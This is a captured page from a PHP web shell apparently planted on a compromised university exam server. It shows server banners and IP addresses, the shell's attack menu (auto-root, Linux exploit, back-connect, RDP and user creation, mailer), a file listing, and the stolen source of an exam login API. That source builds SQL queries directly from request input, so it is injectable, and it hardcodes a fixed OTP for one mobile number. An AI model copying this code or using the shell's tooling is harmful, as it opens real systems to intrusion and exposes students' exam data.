Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.12.163.23
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
univadmin /
unilite /
[ HOME SHELL ]
Name
Size
Permission
Action
ultGetMenus.php
2.36
KB
-rwxr-xr-x
ultLogin.php
3.17
KB
-rwxr-xr-x
ultNotification.php
1.05
KB
-rwxr-xr-x
ultProfile.php
1.73
KB
-rwxr-xr-x
ultRegistration.php
4.82
KB
-rwxr-xr-x
ultRoomDet.php
1.98
KB
-rw-rw-r--
uniliteAPI1.php
11.3
KB
-rwxr-xr-x
uniliteAPI1_17032021.php
9.33
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uniliteAPI1.php
<?php // require_once(__DIR__."/../sendsmsapi.php"); require_once("/var/www/html/sms/sendsmsapiv1.php"); function loginETOSendOTP($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $mobile = $aobj_context->mobj_data['mobile']; if($mobile == '') { $arr['msg'] = 'Invalid Params.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $query = "select funivcode, fmobile, fotp from ansto where fmobile = '{$mobile}' and ifnull(fsuspend,'') <> 'T' and ifnull(fdeleted,'') <> 'T' and date(now()) between fdatefrom and fdateto"; // var_dump $result = $aobj_context->mobj_db->GetAll($query); $univcode = $result[0]['funivcode']; // var_dump($univcode); if(!count($result) > 0) { $arr['msg'] = 'Mobile No. not registered / activated from exam center.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $query = "select fmobile, ifnull(fotp,'') as fotp from ansto where fmobile = '{$mobile}' and ROUND(time_to_sec((TIMEDIFF(NOW(), fotpdate))) / 60) <= 5"; $result = $aobj_context->mobj_db->GetRow($query); date_default_timezone_set('Asia/Kolkata'); $time = date("h:i A"); if(count($result) > 0 && $result['fotp'] != "") { //$arr['row'] = $row; $motpaswrd = $result['fotp']; } else { $motpaswrd = rand(100000, 900000); //strtoupper(substr(sha1(rand()), 0, 4)); } if($mobile == '9741089633') $motpaswrd = "123456"; $query1 = "select FFOLDER from logisys3_comexam.dbname where funivcode = '{$univcode}'"; $res = $aobj_context->mobj_db->GetRow($query1); $FFOLDER = $res['FFOLDER']; $smsotp = "From $FFOLDER: Dear User, OTP for Registration is $motpaswrd. sent at {$time} - Uniclare"; $sms = new SMS($univcode, 'LREG'); $sms->sendIndvidualSms($mobile, $smsotp, '900', 'LREG'); $query = "update ansto set fotp = '{$motpaswrd}', fotpdate = now() where fmobile = '{$mobile}'"; $result = $aobj_context->mobj_db->Execute($query); if($result) { $arr['msg'] = "OTP Sent to your mobile."; echo $aobj_context->mobj_output->ToJSONEnvelope($arr, 0,"success"); } else { $arr['msg'] = 'Error While Registration.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); } } function uniliteLogin($aobj_context) { require_once(__DIR__.'/../src/jwt.php'); require_once(__DIR__.'/../src/constants.php'); $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); // var_dump($aobj_context); $mobile = $aobj_context->req_body["mobile"]; $motp = $aobj_context->req_body["motp"]; // var_dump($mobile); // var_dump($motp); if($mobile == '' || strlen($mobile) != 10 ) { $arr['msg'] = 'Enter Valid Mobile. No.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } if($motp == '' || strlen($motp) != 6 ) { $arr['msg'] = 'Enter Valid OTP'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $query = "select fmobile, fotp from ansto where fmobile = '{$mobile}' and ifnull(fsuspend,'') <> 'T' and ifnull(fdeleted,'') <> 'T' and date(now()) between fdatefrom and fdateto"; $result = $aobj_context->mobj_db->GetAll($query); if(count($result) == 0) { $arr['msg'] = 'Mobile No. not registered / activated from exam center.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $query = "select fmobile, ifnull(fotp,'') as fotp, fname, funivcode, fcntrcode,fdeggrp, fyear, fexamtype from ansto where fmobile = '{$mobile}' and fotp = '{$motp}' and ROUND(time_to_sec((TIMEDIFF(NOW(), fotpdate))) / 60) <= 5"; $result = $aobj_context->mobj_db->GetAll($query); date_default_timezone_set('Asia/Kolkata'); // var_dump($result); if(count($result) > 0) { $result = $result[0]; $arr['loginfo'] = $result; $paylod = [ 'iat' => time(), 'iss' => 'https://universitysolutions.in/univadmin/', 'exp' => time() + (60*60), 'userId' => $result['fcntrcode'].'-'.$result['funivcode'].'-'.$result['fmobile'] ]; $token = JWT::encode($paylod, SECRETE_KEY); $arr['token'] = $token; $query = "update ansto set ftoken = '{$token}' where fmobile = '{$mobile}'"; $result = $aobj_context->mobj_db->Execute($query); echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); } else { $arr['msg'] = 'OTP Timed out try resend.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); } } function uniliteGetMenus($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); // var_dump($aobj_context->req_body); $mobile = $aobj_context->req_body["mobile"]; $imei = $aobj_context->req_body["imei"]; $ip = $_SERVER['REMOTE_ADDR']; $headers = $aobj_context->headers; // var_dump($headers); $origin = $headers["X-Auth-Origin"]; $type = $headers["X-Auth-Type"]; if ($origin == 'UNICLARE' || ($origin == 'E-GOVERNANCE' && $type !== 'LOGREGN')) { $token = $headers["X-Auth-Token"]; // var_dump($token); try { $payload = JWT::decode($token, SECRETE_KEY, ['HS256']); // var_dump($payload); $_SESSION['user_id'] = $payload->userId; } catch (Exception $e) { throwError(ACCESS_TOKEN_ERRORS, $e->getMessage()); die(); } } $query = "update ansto set fipadd = '{$ip}', fimei = '{$imei}', flastvisit = now() where fmobile = '{$mobile}'"; // var_dump($query); $result = $aobj_context->mobj_db->Execute($query); $query = "select a.fmobile, a.fname, a.funivcode, a.fcntrcode,a.fdeggrp, a.fyear, a.fexamtype, concat(c.fcollname, ', ',c.ftown) as fcollname, d.fdescpn, d.fexamdate, date_format(ifnull(a.fdatefrom,now()), '%d/%m/%Y') as fdatefrom, date_format(ifnull(a.fdateto,now()), '%d/%m/%Y') as fdateto, co.funivname from logisys3_comexam.ansto a inner join college c on a.fcntrcode = c.fcollcode inner join deggrp d on a.fdeggrp = d.fdeggrp inner join control co where a.fmobile = '{$mobile}' and ifnull(a.fsuspend,'') <> 'T' and date(now()) between a.fdatefrom and a.fdateto"; $result = $aobj_context->pobj_db->GetRow($query); if(count($result) == 0) { $arr['msg'] = 'Login Again !!!'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $menus = array( array( 'fid'=>'1', 'fname' => "Download Data", 'icon' => "download" ), array( 'fid' => "2", 'fname' => "Capture Barcode", 'icon' => "capture" ), array( 'fid' => "3", 'fname' => "Upload Data", 'icon' => "upload" ), array( 'fid' => "4", 'fname' => "View Details", 'icon' => "warning" ) ); $arr['menus'] = $menus; $arr['perInfo'] = $result; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); } function getStudInfo($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $univcode = trim($aobj_context->mobj_data["univcode"]); $v1 = trim($aobj_context->req_body["v1"]); $v2 = trim($aobj_context->req_body["v2"]); $v3 = trim($aobj_context->req_body["v3"]); $regno = ""; $fqpcode = ""; $ansbook = ""; if(strlen($v1) == 5) { $fqpcode = $v1; $regno = $v2; $ansbook = $v3; }else if(strlen($v2) == 5) { $fqpcode = $v2; $regno = $v1; $ansbook = $v3; }else if(strlen($v3) == 5) { $fqpcode = $v3; $regno = $v1; $ansbook = $v2; } $url = "https://university-student-photos.s3.ap-south-1.amazonaws.com/$univcode/"; $query = "select fregno from student where fregno in('{$regno}','{$ansbook}')"; $result = $aobj_context->pobj_db->getRow($query); if($result['fregno'] == '') { $arr['msg'] = 'Invalid Register No.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr, -1, "failure"); return; } $fregno = $result['fregno']; $fansbook = ($fregno != $ansbook) ? $ansbook : $regno; $query1 = "select a.fregno, s.fname, a.fqpcode, sb.fsubname, a.fcntrcode, concat('{$url}', ifnull(s.fphotopath, 'Xyz.jpeg')) as fphotopath, concat(c.fcollname, ', ', c.ftown) as fcntrname, a.fdegree, d.fdescpn, s.fcollcode, concat(c1.fcollname, ', ', c1.ftown) as fcollname from anscapt a inner join student s on a.fregno = s.fregno inner join subject sb on a.fqpcode = sb.fqpcode inner join degree d on a.fdegree = d.fdegree and d.fexamno = 'A' inner join college c on a.fcntrcode = c.fcollcode inner join college c1 on s.fcollcode = c1.fcollcode where a.fregno = '{$fregno}' and a.fqpcode = '{$fqpcode}' group by a.fregno, a.fqpcode"; $result1 = $aobj_context->pobj_db->GetRow($query1); // $res['fsubname'] = $result1['fsubname']; if ($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1, 0, "success"); return; } else { $arr['msg'] = 'No Deatils found'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr, -1, "failure"); return; } } function uniliteGetCntrData($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $fcntrcode = $aobj_context->mobj_data['fcntrcode']; $univcode = trim($aobj_context->mobj_data["univcode"]); if($fcntrcode == '') { $arr['msg'] = 'Invalid Params.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $url = "https://university-student-photos.s3.ap-south-1.amazonaws.com/$univcode/"; $query1 = "select a.fregno, s.fname, a.fqpcode, sb.fsubname, a.fcntrcode, concat('{$url}', ifnull(s.fphotopath, 'Xyz.jpeg')) as fphotopath, concat(c.fcollname, ', ', c.ftown) as fcntrname, a.fdegree, d.fdescpn, s.fcollcode, concat(c1.fcollname, ', ', c1.ftown) as fcollname from anscapt a inner join student s on a.fregno = s.fregno inner join subject sb on a.fqpcode = sb.fqpcode inner join degree d on a.fdegree = d.fdegree and d.fexamno = 'A' inner join college c on a.fcntrcode = c.fcollcode inner join college c1 on s.fcollcode = c1.fcollcode where a.fcntrcode = '{$fcntrcode}' group by a.fregno, a.fqpcode"; $result1 = $aobj_context->pobj_db->GetAll($query1); if (count($result1) > 0) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1, 0, "success"); return; } else { $arr['msg'] = 'No Deatils found'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr, -1, "failure"); return; } }
Close
